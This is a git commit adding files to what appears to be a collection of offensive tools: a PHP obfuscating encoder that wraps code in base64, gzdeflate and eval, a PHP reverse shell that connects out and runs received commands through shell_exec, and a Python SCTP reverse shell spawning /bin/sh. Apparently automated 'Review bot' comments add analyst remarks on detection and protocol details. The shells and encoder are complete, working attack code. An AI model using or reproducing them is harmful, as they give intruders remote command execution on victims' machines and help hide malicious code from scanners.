update php

tennc 2013-06-27 09:48:53 +08:00
parent 7fd6ddd078
commit 4ba14147b0
5 changed files with 4370 additions and 0 deletions

103
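--- /dev/null
+++ b/php/carbylamine.txt
@@ -0,0 +1,103 @@
+<?php
+function rstr() //Random String Function
+{
+$len=rand(3,6);
+$chr='';
+for($i=1;$i<=$len;$i++)
+{
+$chr.=rand(0,1) ? chr(rand(65,90)) : chr(rand(97,122));
+}
+return $chr;
+}
+function enjumble($data) //Custom Encoding + Base64 + gzinflate()
+{
+for($i=0;$i<strlen($data);$i++)
+{
+$data[$i]=chr(ord($data[$i])+1);
+}
+return base64_encode(gzdeflate($data,9));
+}
+function striptag($in) //Remove '<?php' from initial code
+{
+$pos = strpos($in,"<?php"); //to do: add support for short_tags
+if(is_numeric($pos))
+{
+for($i=$pos;$i<=$pos+4 && strlen($in) >=5;$i++)
+{
+$in[$i]=' ';
+}
+return $in;
+}
+else
+{
+return $in;
+}
+}
+function makeoutfile($str)
+{ $funcname=rstr();
+$varname='$'.rstr();
+$template=
+"<?php function ".$funcname."($varname)
+{
+$varname=gzinflate(base64_decode($varname));
+for(\$i=0;\$i<strlen($varname);\$i++)
+{
+".$varname."[\$i] = chr(ord(".$varname."[\$i])-1);
+}
+return $varname;
+}eval($funcname(\"";
+$str=enjumble($str);
+$template = $template . $str."\"));?>";
+return $template;
+}
+function main($argc,$argv)
+{
+$banner=
+"\n +-------------------------------------------------------------------+
+|+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++|
+|+ +|
++____ _ _ _ +|
+/ __ \ | | | | (_) +|
+| / \/ __ _ _ __ | |__ _ _ | | __ _ _ __ ___ _ _ __ _+|_
+| | / _` || '__|| '_ \ | | | || | / _` || '_ ` _ \ | || '_ \ / _ \
+| \__/\| (_| || | | |_) || |_| || || (_| || | | | | || || | | || __/
+\____/ \__,_||_| |_.__/ \__, ||_| \__,_||_| |_| |_||_||_| |_| \___|
+|+ __/ | +|
+|+ Carbylamine PHP Encoder +|
+|+ v0.1.1 Nightly +|
+|+ +|
+|+ +|
+|+ Coded by Prakhar Prasad +|
+|+ (prakharpd@gmail.com) +|
+|+ +|
+|+ +|
+|+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++|
++-------------------------------------------------------------------+\n\n";
+$usage="$banner Syntax: ".$_SERVER['PHP_SELF']." <file to encode> <output file>\n";
+if($argc==1) {echo $usage ; die();}
+if($argc>1) $file = $argv[1];
+if($argc>2) $outfile = $argv[2];
+if(empty($file) || empty($outfile)) { echo "Input/Output filename not entered!\n\n\x07" ;die();}
+if(!file_exists($file))
+{
+echo "$banner Error: Input file doesn't exist\n\n\x07";
+}
+else{
+$orginal_size=round(filesize($file)/1024,2);
+echo "$banner Encoding : $file ($orginal_size KB) \n\n ";
+$output_filename=$outfile;
+$outfile=fopen($outfile,'w+');
+$file=fread(fopen($file,'r'),filesize($file));
+$outdata=makeoutfile(striptag($file));
+$newsize=round(strlen($outdata)/1024,2);
+echo " Compression : ".@round(100-(($newsize*100)/($orginal_size!=0?$orginal_size:1)),2)."%\n\n";
+if(!fwrite($outfile,$outdata))
+{
+echo " Unable to write to $output_filename\n\n\x07";
+}
+else
+{
+echo " Successfully Encoded! to $output_filename\n\n" ;
+}}}
+main($argc,$argv);
+?>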
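Review bot: The comment on `enjumble()` names the wrong function: the body calls `gzdeflate($data,9)`, and it is the stub generated by `makeoutfile()` that calls `gzinflate`, so the comment should read `//Byte shift (+1) + gzdeflate() + Base64`. The file also has no header describing what the encoder emits, which is the part that matters when writing a detection from this sample. Per `makeoutfile()`, only the function and variable names vary (3–6 letters from `rstr()`), while the `gzinflate(base64_decode(...))` call, the `-1` byte loop and the `eval(` of the decoded payload are fixed. A one-line header such as `// Output is a reversible encoding, not encryption: base64 -> gzinflate -> subtract 1 per byte` would state that explicitly.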

2347
php/indrajith-2.0.txt Normal file

File diff suppressed because it is too large Load diff

1782
php/indrajith.txt Normal file

File diff suppressed because it is too large Load diff

102
php/reverseshell-poc.txt Normal file

@ -0,0 +1,102 @@
<?php
###################################################
# Reverse Shell v1.0 #
# Authentication Feature #
# #
# Hacksys Team - Panthera #
# Author: Ashfaq Ansari #
# hacksysteam@hotmail.com #
# http://hacksys.vfreaks.com #
# Designed for Linux #
# Thanks to lionaneesh #
# lionaneesh@gmail.com #
###################################################
ini_set('max_execution_time' ,0);
$VERSION = "1.0";
$ip = "127.0.0.1"; #Change this
$port = 4444; #Change this
$password = base64_decode("aGFja3N5c3RlYW0="); #Default Password: hacksysteam (MD5)
$banner = ("
_ _ _ _____
| | | | | | / ____|
| |__| | __ _ ___| | _| (___ _ _ ___
| __ |/ _` |/ __| |/ /\___ \| | | / __|
| | | | (_| | (__| < ____) | |_| \__ \
|_| |_|\__,_|\___|_|\_\_____/ \__, |___/
_______ __/ |
|__ __| |___/
| | ___ __ _ _ __ ___
| |/ _ \/ _` | '_ ` _ \
| | __/ (_| | | | | | |
|_|\___|\__,_|_| |_| |_|
Reverse Shell in PHP
Author: Ashfaq Ansari
hacksysteam@hotmail.com
http://hacksys.vfreaks.com/\n\n");
$pwd = shell_exec("pwd");
$sysinfo = shell_exec("uname -a");
$id = shell_exec('id | cut -d "(" -f 2 | cut -d ")" -f 1' );
$date = shell_exec("date");
$len = 1337;
$info =
("
System Information:\n$sysinfo
Current Working Directory: $pwd
User Group: $id
Current Date and Time: $date\n
");
print "\nTrying to connect to: $ip on port $port ...\n\n";
$sockfd = fsockopen($ip , $port , $errno, $errstr );
if($errno != 0)
{
print "\n****** Error Occured ******\nError Nnumber: $errno\nError String: $errstr\n\n";
die(0);
}
else if (!$sockfd)
{
print "Fatal : An unexpected error was occured when trying to connect!\n";
}
else
{
print "Connected to: $ip on port $port ...\n\n";
fputs ($sockfd , $banner);
fputs($sockfd ,"Enter Password: ");
$getpass = trim(fgets($sockfd, strlen($password) + 2));
if ($getpass == $password)
{
fputs($sockfd, "\nAuthentication Successfull..\n");
fputs($sockfd, $info);
while(!feof($sockfd))
{
$cmdPrompt = trim($id) . "@" . trim($ip) . ":~" . trim($pwd) . "# ";
fputs ($sockfd , $cmdPrompt );
$command = trim(fgets($sockfd, $len));
if (trim($command) == "exit")
{
fputs($sockfd ,"\nAborted by user... Exiting..." );
fclose($sockfd);
die(0);
}
fputs($sockfd , "\n" . shell_exec($command) . "\n");
}
fclose($sockfd);
die(0);
}
else
{
fputs($sockfd ,"\nInvalid Password... Quitting...");
fclose($sockfd);
die(0);
}
}
?>
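Review bot: The `(MD5)` in the comment on the `$password` line is wrong: the value is only base64-decoded at runtime and then compared with the client's input using `==`, so no hash is involved and the default password can be read straight from the file. The comment should say so, e.g. `#Default password: hacksysteam (base64-encoded, not hashed)`. The header block also omits what an analyst needs for triage. The script connects out to `$ip`:`$port` over a plain `fsockopen` socket, so the banner and the `Enter Password: ` prompt cross the network unencrypted. Every line received after login is passed unchanged to `shell_exec`.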

36
py/sctp_reverse.py.txt Normal file

@ -0,0 +1,36 @@
#!/usr/bin/python
# SCTP Reverse Shell (TCP mode)
# Requires pysctp and sctp to be working
# on the victim box.
# My perfect saturday... Involves #
# infodox - Insecurety Research 2013
# insecurety.net | @info_dox
# I probably imported too much things. Who cares.
import socket
import _sctp
import sctp
from sctp import *
import os
import subprocess
host = '127.0.0.1' # CHANGEME
port = 1337 # CHANGEME
socket.setdefaulttimeout(60)
s = None
try:
s = sctpsocket_tcp(socket.AF_INET)
s.connect((host,port))
s.send('g0tsh3ll!\n')
save = [ os.dup(i) for i in range(0,3) ]
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
shell = subprocess.call(["/bin/sh","-i"])
[ os.dup2(save[i],i) for i in range(0,3)]
[ os.close(save[i]) for i in range(0,3)]
os.close(s.fileno())
except Exception:
print "Connection Failed! Is there even a listener?"
pass
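Review bot: The header comment `# SCTP Reverse Shell (TCP mode)` is easy to misread as TCP traffic. `sctpsocket_tcp(socket.AF_INET)` opens a one-to-one (TCP-style) SCTP socket, so the connection is SCTP (IP protocol 132), which is the detail egress rules and capture filters need to account for. I would reword the comment to `# SCTP reverse shell (one-to-one "TCP-style" SCTP socket; not TCP)`. Separately, `except Exception:` appears to cover the whole `try` body, so a failure in the `os.dup2` calls or in `subprocess.call` is also reported as `Connection Failed!`, and the message is not a reliable indicator when the sample is examined in a sandbox. The listing on this page has lost its indentation, so the block structure is inferred.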